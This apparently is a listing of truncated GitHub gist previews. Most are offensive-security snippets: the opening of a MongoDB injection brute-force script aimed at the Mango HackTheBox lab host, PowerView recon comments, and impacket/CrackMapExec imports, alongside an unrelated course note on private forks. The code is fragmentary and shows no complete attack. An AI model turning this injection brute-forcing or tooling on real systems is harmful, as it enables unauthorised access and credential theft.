| #ippsec's Mango HTB mongo DB brute force script | |
| import requests | |
| def inject(data): | |
| r = requests.post('http://staging-order.mango.htb/', data=data, allow_redirects=False) | |
| if r.status_code != 200: | |
| return True | |
| #can add prefixes to secret to pretext where the brute-force begins | |
| secret = "" | |
| payload = "" |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| import bz2 | |
| import csv | |
| import io | |
| import os | |
| import tarfile | |
| import requests | |
| import argparse | |
| from termcolor import colored | |
The repository for the assignment is public and Github does not allow the creation of private forks for public repositories.
The correct way of creating a private frok by duplicating the repo is documented here.
For this assignment the commands are:
git clone --bare git@github.com:usi-systems/easytrace.git
| import sys | |
| from impacket_rdpcheck import check_rdp as imp_checkrdp | |
| import impacket_rdpcheck_original as imp_checkrdp_orig | |
| from argparse import ArgumentParser | |
| from pypsrp.client import Client | |
| from impacket import tds | |
| from sys import stdout | |
| from os import path | |
| from cme import crackmapexec |